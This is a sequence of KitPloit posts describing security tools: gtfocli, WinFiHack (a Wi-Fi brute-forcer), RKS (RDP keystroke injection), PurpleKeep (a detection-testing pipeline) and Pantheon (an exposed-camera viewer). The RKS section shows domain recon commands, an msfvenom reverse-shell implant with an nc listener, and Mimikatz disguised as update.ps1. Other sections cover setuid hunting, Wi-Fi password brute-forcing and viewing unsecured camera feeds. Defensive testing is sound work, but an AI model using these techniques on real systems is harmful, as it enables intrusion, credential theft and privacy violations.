<p>Search for binary <code>Winget.exe</code>:</p> <pre><code>gtfocli search Winget --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> from <code>stdin</code>:</p> <pre><code>echo "Winget" | gtfocli search --os windows<br /></code></pre> <p>Search for the binaries listed in a file:</p> <pre><code>cat windowsExecutableList.txt<br />Winget<br />c:\\Users\\Desktop\\Ssh<br />Stordiag<br />Bash<br />c:\\Users\\Runonce.exe<br />Cmdkey<br />c:\dir\subDir\Users\Certreq.exe<br /><br />gtfocli search -f windowsExecutableList.txt --os windows<br /></code></pre> <p>Search for binary <code>Winget</code> and print the output in <code>yaml</code> format (see <code>-h</code> for the available formats):</p> <pre><code>gtfocli search Winget -o yaml --os windows<br /></code></pre> <h3>Search using the Docker image</h3> <p>Examples:</p> <p>Search for binary <code>Winget</code> and print the output in <code>yaml</code> format:</p> <pre><code>docker run -i cmdtoolsowner/gtfocli search Winget -o yaml --os windows<br /></code></pre> <p>Search for binary <code>tar</code> and print the output in <code>json</code> format:</p> <pre><code>echo 'tar' | docker run -i cmdtoolsowner/gtfocli search -o json<br /></code></pre> <p>Search for the binaries listed in a file mounted as a volume in the container:</p> <pre><code>cat myBinaryList.txt<br />/bin/bash<br />/bin/sh<br />tar<br />arp<br />/bin/tail<br /><br />docker run -i -v $(pwd):/tmp cmdtoolsowner/gtfocli search -f /tmp/myBinaryList.txt<br /></code></pre> <h2>CTF</h2> <p>A common use case for <code>gtfocli</code> is chaining it with <code>find</code> to check every setuid binary on the box:</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) -exec gtfocli search {} \; 2>/dev/null<br /></code></pre> <p>or</p> <pre><code>find / -type f \( -perm 04000 -o -perm -u=s \) 2>/dev/null | gtfocli search<br /></code></pre> <h2>Credits</h2> <p>Thanks to <a href="https://gtfobins.github.io/" rel="nofollow" target="_blank" title="GTFOBins">GTFOBins</a> and <a 
href="https://lolbas-project.github.io/" rel="nofollow" target="_blank" title="LOLBAS">LOLBAS</a>; without these projects <code>gtfocli</code> would never have come to light.</p> <h2>Contributing</h2> <p>You want to contribute to this project? Wow, thanks! Please fork it and send a pull request.</p><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/cmd-tools/gtfocli" rel="nofollow" target="_blank" title="Download Gtfocli">Download Gtfocli</a></span></b></div><p><b>WinFiHack - A Windows Wifi Brute Forcing Utility Which Is An Extremely Old Method But Still Works Without The Requirement Of External Dependencies</b> (KitPloit, 2024-03-07)</p><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <p>WinFiHack is a recreational attempt by me to rewrite my previous project <a href="https://github.com/morpheuslord/Brute-Hacking-Framework-SourceCode" rel="nofollow" target="_blank" title="Brute-Hacking-Framework's">Brute-Hacking-Framework's</a> main wifi <a href="https://www.kitploit.com/search/label/Hacking" target="_blank" title="hacking">hacking</a> script that uses netsh and native <a href="https://www.kitploit.com/search/label/Windows" target="_blank" 
title="Windows">Windows</a> <a href="https://www.kitploit.com/search/label/Scripts" target="_blank" title="scripts">scripts</a> to create a wifi bruteforcer. It is neither a fast script nor a superior way of doing the same attack, but it needs nothing beyond Python and a couple of small packages.</p> <span style="font-size: large;"><b>Installation</b></span><br /> <p>The dependencies are minimal 😅. The install command is:</p> <pre><code>pip install rich pyfiglet<br /></code></pre> <p>That's it.</p> <br /><span style="font-size: large;"><b>Features</b></span><br /> <p>The features:</p> <ul> <li><em>Overall Features:</em> <ul> <li>Custom or non-default interfaces can be used to run the attack.</li> <li>Well-defined way of using netsh to list and select targets.</li> <li>Upgradeability.</li> </ul> </li> <li><em>Code-Wise Features:</em> <ul> <li>Interactive menu-driven system built with <code>rich</code>.</li> <li>Versatility in choosing the interface, targets, and password files.</li> </ul> </li> </ul> <br /><span style="font-size: large;"><b>How it works</b></span><br /> <p>This is how the <a href="https://www.kitploit.com/search/label/Bruteforcer" target="_blank" title="bruteforcer">bruteforcer</a> works:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/s1294/WinFiHack.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1294" height="338" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT_dEl__4bS3PemOXSqpWEodVychVoBH3nXYYMRSoZ_tb3d1Az4UD1HtKy220wlWHvDK0lmedXfnq7Ug6WWvvsR56G25DFzVFBioQZTTDIEt84doJndmsvQUCjL87lo29OXX87nl-m9INngArO1PTJo2cGP8aLyM184-ltLtHSeWRzPTq6KMKJcEhKhHCz/w640-h338/WinFiHack.png" width="640" /></a></div> <ul> <li> <p><em>Provide Interface:</em></p> </li> <li> <p>The user is required to provide the network interface for the tool to use.</p> </li> <li> <p>By default, the interface is set to <code>Wi-Fi</code>.</p> </li> <li> <p><em>Search and Set Target:</em></p> </li> <li> <p>The user must search for and select the target network.</p> </li> <li> <p>During this process, the tool performs the following sub-steps:</p> <ul> <li>Disconnects all active network connections for the selected interface.</li> <li>Searches for all available networks within range.</li> </ul> </li> <li> <p><em>Input Password File:</em></p> </li> <li> <p>The user inputs the path to the password file.</p> </li> <li> <p>The default path for the password file is <code>./wordlist/default.txt</code>.</p> </li> <li> <p><em>Run the Attack:</em></p> </li> <li> <p>With the target set and the password file ready, the tool is now prepared to initiate the attack.</p> </li> <li> <p><em>Attack Procedure:</em></p> </li> <li>The attack involves iterating through each password in the provided file.</li> <li>For each password, the following steps are taken:<ul> <li>A custom XML configuration for the connection attempt is generated and stored.</li> <li>The tool attempts to connect to the target network using the generated XML and the current password.</li> <li>To verify the success of the connection attempt, the tool performs a "1 packet ping" to Google.</li> <li>If the ping is unsuccessful, the connection attempt is considered failed, and the tool proceeds to the next password in the list.</li> <li>This loop continues until a successful ping response is received, indicating a successful connection attempt.</li> 
</ul> </li> </ul> <br /><span style="font-size: large;"><b>How to run this</b></span><br /> <p style="text-align: left;">After installing the packages just run <code>python main.py</code> and the rest is <a href="https://www.kitploit.com/search/label/History" target="_blank" title="history">history</a> 👍. Make sure you run it on Windows; it relies on netsh and will not work on any other OS. The interface looks like this:</p><p style="text-align: center;"> <a href="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi"><img alt="" border="0" height="412" id="BLOGGER_PHOTO_ID_7343057793834805570" src="https://blogger.googleusercontent.com/img/a/AVvXsEhSbOM25ac1MW1AFwVStQliKBPQOc1HsDFn1rZpyfjWXzq4Z2fFSZ9k0k1gM-pkVabHQ0Mw2Q8c8svq0vKnX3s6-uVLKKc9uegAOI0tNkKEjeFg7cMO85EqeKHhcG5vDPZqcs3cngaXEGvzwaTPnIep5K9u-zRFEf0PWQiJbnFj8X1VJzyHcTVfC53JUVEi=w640-h412" width="640" /></a></p> <br /><span style="font-size: large;"><b>Contributions</b></span><br /> <p>For contributions:</p> <ul> <li><em>First Clone:</em> Clone the repo into your dev environment and make your edits.</li> <li><em>Comments:</em> I would appreciate comments explaining your point of view and what the upgrade does.</li> <li><em>Submit:</em> Submit a PR for me to verify the changes and approve it if appropriate.</li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/morpheuslord/WinFiHack" rel="nofollow" target="_blank" title="Download WinFiHack">Download WinFiHack</a></span></b></div><p><b>RKS - A Script To Automate Keystrokes Through A Graphical Desktop Program</b> (KitPloit, 2024-03-01)</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/s1271/RKS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="691" data-original-width="1271" height="348" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh0XDiXypTK-P_SJe6-IPlWn0NhMiHd3yskhfaVmlqOdirJRN54QZsmCsTXhRFK586TVOBTldBPZXoAsN5JKsnzvWalJT8meCNIRa8IlwhYjMR9HbicCtfYthEcraze2KNpzgDZMcCPeBuKcx-3WSXTQK2VMxHQtOKSp4O8sndz8hsFKH5lyXku-C5YePKU/w640-h348/RKS.png" width="640" /></a></div> <p>A script to automate keystrokes through an active <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="remote desktop">remote desktop</a> session that assists offensive operators in combination with <a href="https://www.kitploit.com/search/label/Living%20Off%20The%20Land" target="_blank" title="living off the land">living off the land</a> techniques.</p> <br /><span style="font-size: large;"><b>About RKS (RemoteKeyStrokes)</b></span><br /> <p>All credit goes to <a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a> for making it possible, so 
I took it upon myself to improve it. I wanted something that helps during the <a href="https://www.kitploit.com/search/label/Post%20Exploitation" target="_blank" title="post exploitation">post exploitation</a> phase when executing commands through a remote desktop.</p> <span style="font-size: large;"><b>Help Menu</b></span><br /> <pre><code>$ ./rks.sh -h<br />Usage: ./rks.sh (RemoteKeyStrokes)<br />Options:<br /> -c, --command <command | cmdfile> Specify a command or a file containing commands to execute<br /> -i, --input <input_file> Specify the local input file to transfer<br /> -o, --output <output_file> Specify the remote output file to transfer<br /> -m, --method <method> Specify the file transfer or execution method<br /> (For file transfer "base64" is set by default if<br /> not specified. For execution method "none" is set<br /> by default if not specified)<br /><br /> -p, --platform <operating_system> Specify the operating system (windows is set by<br /> default if not specified)<br /><br /> -w, --windowname <name> Specify the window name for graphical remote<br /> program (freerdp is set by default if not<br /> specified)<br /><br /> -h, --help Display this help message<br /></code></pre> <br /><span style="font-size: large;"><b>Usage</b></span><br /> <br /><b>Internal Reconnaissance</b><br /> <ul> <li>When running in a command prompt:</li> </ul> <pre><code>$ cat recon_cmds.txt<br />whoami /all<br />net user<br />net localgroup Administrators<br />net user /domain<br />net group "Domain Admins" /domain<br />net group "Enterprise Admins" /domain<br />net group "Domain Computers" /domain<br /><br />$ ./rks.sh -c recon_cmds.txt<br /></code></pre> <br /><b>Execute Implant</b><br /> <ul> <li>Execute an implant by typing the contents of the payload into PowerShell.</li> </ul> <pre><code>$ msfvenom -p windows/x64/shell_reverse_tcp lhost=<IP> lport=4444 -f psh -o implant.ps1<br /><br />$ ./rks.sh -c implant.ps1<br /><br />$ 
nc -lvnp 4444<br /></code></pre> <br /><b>File Transfer</b><br /> <ul> <li>Transfer a file remotely when pivoting in an isolated network. If you want to specify the remote path on Windows, be sure to include quotes.</li> </ul> <pre><code>$ ./rks.sh -i /usr/share/powersploit/Privesc/PowerUp.ps1 -o script.ps1<br /><br />$ ./rks.sh -i /usr/share/powersploit/Exfiltration/Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m base64<br /></code></pre> <br /><b>Specify Graphical Remote Software</b><br /> <ul> <li>If you're targeting VNC network protocols, you can specify the window name with <code>tightvnc</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.ps1 -w tightvnc</code></p> <ul> <li>If you're targeting legacy operating systems with older RDP <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="authentication">authentication</a>, specify the window name with <code>rdesktop</code>.</li> </ul> <p><code>$ ./rks.sh -i implant.bat -w rdesktop</code></p> <br /><span style="font-size: large;"><b>TODO and Help Wanted</b></span><br /> <ul> <li> <p>Add text colors for better user experience</p> </li> <li> <p>Implement Base64 file transfer</p> </li> <li> <p>Implement Bin2Hex file transfer</p> </li> <li> <p>Implement a persistence function for both Windows and Linux.</p> </li> <li> <p>Implement <a href="https://www.kitploit.com/search/label/Antiforensics" target="_blank" title="antiforensics">antiforensics</a> function for both Windows and Linux.</p> </li> <li> <p>Implement reading shellcode input and running a C# implant and PowerShell runspace</p> </li> <li> <p>Implement privesc function for both Windows and Linux</p> </li> </ul> <br /><span style="font-size: large;"><b>References</b></span><br /> <ul> <li> <p><a href="https://www.youtube.com/watch?v=8YFEujJUxws" rel="nofollow" target="_blank" title="Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)">Video: sethc.exe Backdoor CMD Payload delivery (USB Rubber Ducky style)</a></p> 
</li> <li> <p><a href="https://github.com/nopernik/mytools/blob/master/rdp-cmd-delivery.sh" rel="nofollow" target="_blank" title="Original Script">Original Script</a></p> </li> <li> <p><a href="https://github.com/ztgrace/sticky_keys_hunter" rel="nofollow" target="_blank" title="sticky_keys_hunter">sticky_keys_hunter</a></p> </li> </ul> <br /><span style="font-size: large;"><b>Credits</b></span><br /> <ul> <li><a href="https://github.com/nopernik" rel="nofollow" target="_blank" title="nopernik">nopernik</a></li> </ul><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/U53RW4R3/RKS" rel="nofollow" target="_blank" title="Download RKS">Download RKS</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-38848302592317033582024-01-30T08:30:00.000-03:002024-01-30T08:30:00.123-03:00PurpleKeep - Providing Azure Pipelines To Create An Infrastructure And Run Atomic Tests<p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p><div><br /></div> <p dir="auto">With the rapidly increasing variety of attack techniques and a simultaneous rise in the number of detection rules offered by EDRs (Endpoint Detection and Response) and custom-created ones, the need for constant functional testing of detection rules has become evident. 
However, manually re-running these attacks and cross-referencing them with detection rules is a labor-intensive task which is worth automating.</p> <p dir="auto">To address this challenge, I developed "PurpleKeep," an open-source initiative designed to facilitate the <a href="https://www.kitploit.com/search/label/Automated%20Testing" target="_blank" title="automated testing">automated testing</a> of detection rules. It leverages the capabilities of the <a href="https://atomicredteam.io" rel="nofollow" target="_blank" title="Atomic Red Team project">Atomic Red Team project</a>, which allows simulating attacks following <a href="https://attack.mitre.org/" rel="nofollow" target="_blank" title="MITRE TTPs">MITRE TTPs</a> (Tactics, Techniques, and Procedures), and enhances the simulation of these TTPs to serve as a starting point for the <a href="https://www.kitploit.com/search/label/Evaluation" target="_blank" title="evaluation">evaluation</a> of the effectiveness of detection rules.</p> <p dir="auto">Automating the process of simulating one or multiple TTPs in a test environment comes with certain challenges, one of which is the contamination of the platform after multiple simulations. PurpleKeep aims to overcome this hurdle by streamlining the simulation process and facilitating the creation and <a href="https://www.kitploit.com/search/label/Instrumentation" target="_blank" title="instrumentation">instrumentation</a> of the targeted platform.</p> <p dir="auto">Primarily developed as a proof of concept, PurpleKeep serves as an End-to-End Detection Rule Validation platform tailored for an Azure-based environment. It has been tested in combination with the automatic deployment of Microsoft Defender for Endpoint as the preferred EDR solution. 
PurpleKeep also provides support for security and audit policy configurations, allowing users to mimic the desired endpoint environment.</p> <p dir="auto">To facilitate analysis and monitoring, PurpleKeep integrates with Azure Monitor and Log Analytics services to store the simulation logs and allow further correlation with any events and/or alerts stored in the same platform.</p> <p dir="auto">TLDR: PurpleKeep provides an Attack Simulation platform to serve as a starting point for your End-to-End Detection Rule Validation in an Azure-based environment.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Requirements</h2> <p dir="auto">The project is based on Azure Pipelines and requires the following to be able to run:</p> <ul dir="auto"> <li>Azure Service Connection to a resource group as described in the <a href="https://learn.microsoft.com/en-us/azure/devops/pipelines/library/service-endpoints?view=azure-devops&tabs=yaml" rel="nofollow" target="_blank" title="Microsoft Docs">Microsoft Docs</a></li> <li>Assignment of the "Key Vault Administrator" Role for the previously created Enterprise Application</li> <li>MDE onboarding script, placed as a Secure File in the Library of Azure DevOps and made accessible to the pipelines</li> </ul> <h3 dir="auto" tabindex="-1">Optional</h3> <p dir="auto">You can provide a security and/or audit policy file that will be loaded to mimic your <a href="https://www.kitploit.com/search/label/Group%20Policy" target="_blank" title="Group Policy">Group Policy</a> configurations. 
Use the Secure File option of the Library in Azure DevOps to make it accessible to your pipelines.</p> <p dir="auto">Refer to the <a href="https://github.com/Retrospected/PurpleKeep/blob/main/variables.yml" rel="nofollow" target="_blank" title="variables">variables</a> file for your configurable items.</p> <h2 dir="auto" tabindex="-1">Design</h2> <p dir="auto" style="text-align: center;"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/docs/PurpleKeep_1.0.jpg" rel="nofollow" target="_blank" title="Providing Azure pipelines to create an infrastructure and run Atomic tests. (9)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo"><img alt="" border="0" height="258" id="BLOGGER_PHOTO_ID_7310071996835853026" src="https://blogger.googleusercontent.com/img/a/AVvXsEitdMCwRvq7xoPJRC_HhfwWpDsB2p1f-r3npUI_cXMKnU1OZrvYhic80imcZQXwUT9FIR_w-jAtWf8YKHfcvhN7d3XWHvgiC8lTdLmdmqC1g23kwsf5fgAwTKMg3l3-NQNVLfAsYX1kEby3U1mPEpnzUbIs4hJvRKSbDeh2JGMXCYkZI4vPPBXVLQUEfDBo=w640-h258" width="640" /></a></p> <h2 dir="auto" tabindex="-1">Infrastructure</h2> <p dir="auto">Deploying the <a href="https://www.kitploit.com/search/label/Infrastructure" target="_blank" title="infrastructure">infrastructure</a> uses the Azure Pipeline to perform the following steps:</p> <ul dir="auto"> <li>Deploy Azure services: <ul dir="auto"> <li>Key Vault</li> <li>Log Analytics Workspace</li> <li>Data Connection Endpoint</li> <li>Data Connection Rule</li> </ul> </li> <li>Generate SSH keypair and password for the Windows account and store in the Key Vault</li> <li>Create a Windows 11 VM</li> <li>Install OpenSSH</li> <li>Configure and deploy the SSH public key</li> <li>Install Invoke-AtomicRedTeam</li> <li>Install Microsoft Defender for Endpoint and configure exceptions</li> <li>(Optional) Apply security 
and/or audit policy files</li> <li>Reboot</li> </ul> <h2 dir="auto" tabindex="-1">Simulation</h2> <p dir="auto">Currently only the Atomics from the public repository are supported. The pipeline takes a Technique ID or a comma-separated list of techniques as input, for example:</p> <ul dir="auto"> <li>T1059.003</li> <li>T1027,T1049,T1003</li> </ul> <p dir="auto">The logs of the simulation are ingested into the AtomicLogs_CL table of the Log Analytics Workspace.</p> <p dir="auto">There are currently two ways to run the simulation:</p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/rotate_simulation.yml" rel="nofollow" target="_blank" title="Rotating simulation">Rotating simulation</a></h3> <p dir="auto">This pipeline will deploy a fresh platform after the simulation of each TTP. The Log Analytics workspace will maintain the logs of each run.</p> <p dir="auto"><strong>Warning: this will onboard a large number of hosts into your EDR</strong></p> <h3 dir="auto" tabindex="-1"><a href="https://github.com/Retrospected/PurpleKeep/blob/main/single_deploy_simulation.yml" rel="nofollow" target="_blank" title="Single deploy simulation">Single deploy simulation</a></h3> <p dir="auto">A fresh infrastructure will be deployed only at the beginning of the pipeline. All TTPs will be simulated on this instance. 
This is the fastest way to simulate and prevents onboarding a large number of devices; however, running a lot of simulations in the same environment carries the risk of contaminating the environment and making the simulations less stable and predictable.</p> <h2 dir="auto" tabindex="-1">TODO</h2> <h3 dir="auto" tabindex="-1">Must have</h3> <ul class="contains-task-list"> <li class="task-list-item">Check if pre-reqs have been fulfilled before executing the atomic</li> <li class="task-list-item">Provide the ability to import own group policy</li> <li class="task-list-item">Cleanup biceps and pipelines by using a master template (Complete build)</li> <li class="task-list-item">Build pipeline that runs techniques sequentially with reboots in between</li> <li class="task-list-item">Add Azure ServiceConnection to variables instead of parameters</li> </ul> <h3 dir="auto" tabindex="-1">Nice to have</h3> <ul class="contains-task-list"> <li class="task-list-item">MDE Off-boarding (?)</li> <li class="task-list-item">Automatically join and leave AD domain</li> <li class="task-list-item">Make Atomics repository configurable</li> <li class="task-list-item">Deploy VECTR as part of the infrastructure and ingest results during simulation. 
Also see the <a data-hovercard-type="issue" data-hovercard-url="/SecurityRiskAdvisors/VECTR/issues/235/hovercard" href="https://github.com/SecurityRiskAdvisors/VECTR/issues/235" rel="nofollow" target="_blank" title="VECTR API issue">VECTR API issue</a></li> <li class="task-list-item">Tune alert API call to Microsoft Defender for Endpoint (Microsoft.Security alertsSuppressionRules)</li> <li class="task-list-item">Add C2 infrastructure for manual or C2 based simulations</li> </ul> <h2 dir="auto" tabindex="-1">Issues</h2> <ul class="contains-task-list"> <li class="task-list-item">Atomics do not return if a simulation succeeded or not</li> <li class="task-list-item">Unreliable OpenSSH extension installer failing infrastructure deployment</li> <li class="task-list-item">Spamming onboarded devices in the EDR</li> </ul> <h2 dir="auto" tabindex="-1">References</h2> <ul dir="auto"> <li><a href="https://github.com/splunk/attack_range" rel="nofollow" target="_blank" title="Splunk's Attack Range">Splunk's Attack Range</a></li> <li><a href="https://vimeo.com/819912016/c76af1ca39" rel="nofollow" target="_blank" title="Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts">Sp4rkCon 2023 - Continuous End-to-End Detection Validation and Reporting with Carrie Roberts</a></li> <li><a href="https://redcanary.com/blog/coalmine/" rel="nofollow" target="_blank" title="Red Canary's Coalmine">Red Canary's Coalmine</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Retrospected/PurpleKeep" rel="nofollow" target="_blank" title="Download PurpleKeep">Download PurpleKeep</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-25481858831683682712024-01-01T08:30:00.001-03:002024-01-01T08:30:00.128-03:00Pantheon - Insecure Camera Parser <p></p><p></p><p align="center" dir="auto"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7315978546647309346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS=w640-h292" width="640" /></a></p><p align="center" dir="auto"><br /></p> <p dir="auto">Pantheon is a GUI application that allows users to display information regarding network cameras in various countries as well as an integrated live-feed for non-protected cameras.</p> <h3 dir="auto" tabindex="-1">Functionalities</h3> <p dir="auto">Pantheon allows users to execute an <strong>API</strong> crawler. There was original functionality without the use of any APIs (like Insecam), but Google TOS kept getting in the way of the original scraping mechanism.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Installation</h2> <ol dir="auto"> <li><code>git clone https://github.com/josh0xA/Pantheon.git</code></li> <li><code>cd Pantheon</code></li> <li><code>pip3 install -r requirements.txt</code><br /> Execution: <code>python3 pantheon.py</code></li> </ol> <ul dir="auto"> <li>Note: I will later add a GUI installer to make it fully independent of a CLI</li> </ul> <h3 dir="auto" tabindex="-1">Windows</h3> <ul dir="auto"> <li>You can just follow the steps above or download the official package <a href="https://joshschiavone.com/" rel="nofollow" target="_blank" title="here">here</a>.</li> <li>Note, the PE binary of Pantheon was put together using pyinstaller, so <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows 
Defender</a> might get a bit upset.</li> </ul> <h3 dir="auto" tabindex="-1">Ubuntu</h3> <ul dir="auto"> <li>First, complete steps 1, 2 and 3 listed above. <br /></li> <li><code>chmod +x distros/ubuntu_install.sh</code></li> <li><code>./distros/ubuntu_install.sh</code></li> </ul> <h3 dir="auto" tabindex="-1">Debian and Kali Linux</h3> <ul dir="auto"> <li>First, complete steps 1, 2 and 3 listed above. <br /></li> <li><code>chmod +x distros/debian-kali_install.sh</code></li> <li><code>./distros/debian-kali_install.sh</code></li> </ul> <h3 dir="auto" tabindex="-1">MacOS</h3> <ul dir="auto"> <li>The regular installation steps above should suffice. If not, open up an issue.</li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <p align="center" dir="auto"> <a href="https://github.com/josh0xA/Pantheon/blob/main/imgs/pantheon_second_example.PNG" rel="nofollow" target="_blank" title="Pantheon - Insecure Camera Parser (4)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS"><img alt="" border="0" height="292" id="BLOGGER_PHOTO_ID_7315978546647309346" src="https://blogger.googleusercontent.com/img/a/AVvXsEgphk4FdTXXRSuqk9kNCkaUGmigdJBqDOelPWlALWTirguZ8aVeDlAhQsGKmYVBJXM7DLD2eZ64BUr_mlnN0B1NFuok6RQ-fD35dp_0aZJMDD1dhCmQUY8l-W1hLAiqbM2qoBNPKIe9Pc-Pdq2EDp2O7gHr-oZthvh1cvMEeq5TY5DN3Di9yF-VzpLoietS=w640-h292" width="640" /></a> </p> <p dir="auto">(Enter) on a selected IP:Port to establish a Pantheon webview of the camera. (Use this at your own risk) <br /></p> <p dir="auto">(Left-click) on a selected IP:Port to view the <a href="https://www.kitploit.com/search/label/Geolocation" target="_blank" title="geolocation">geolocation</a> of the camera. <br /> (Right-click) on a selected IP:Port to view the HTTP data of the camera (Ctrl+Left-click for Mac). 
<br /></p> <p dir="auto">Adjust the map as you please to see the markers. <br /></p> <ul dir="auto"> <li>Also note that this app is far from perfect and not every link that shows up is a live feed; some are login pages (Do NOT attempt to log in). <br /></li> </ul> <h2 dir="auto" tabindex="-1">Ethical Notice</h2> <p dir="auto">The developer of this program, Josh Schiavone, is not responsible for misuse of this data <a href="https://www.kitploit.com/search/label/Gathering" target="_blank" title="gathering">gathering</a> tool. Pantheon simply provides information that can be indexed by any modern search engine. Do not try to establish unauthorized access to live feeds that are password protected - that is illegal. Furthermore, if you do choose to use Pantheon to view a live-feed, do so at your own risk. Pantheon was developed for educational purposes only. For further information, please visit: <a href="https://joshschiavone.com/panth_info/panth_ethical_notice.html" rel="nofollow" target="_blank" title="https://joshschiavone.com/panth_info/panth_ethical_notice.html">https://joshschiavone.com/panth_info/panth_ethical_notice.html</a></p> <h2 dir="auto" tabindex="-1">Licence</h2> <p dir="auto">MIT License<br /> Copyright (c) Josh Schiavone</p> <br /><br /><div style="text-align: center;"><b><span 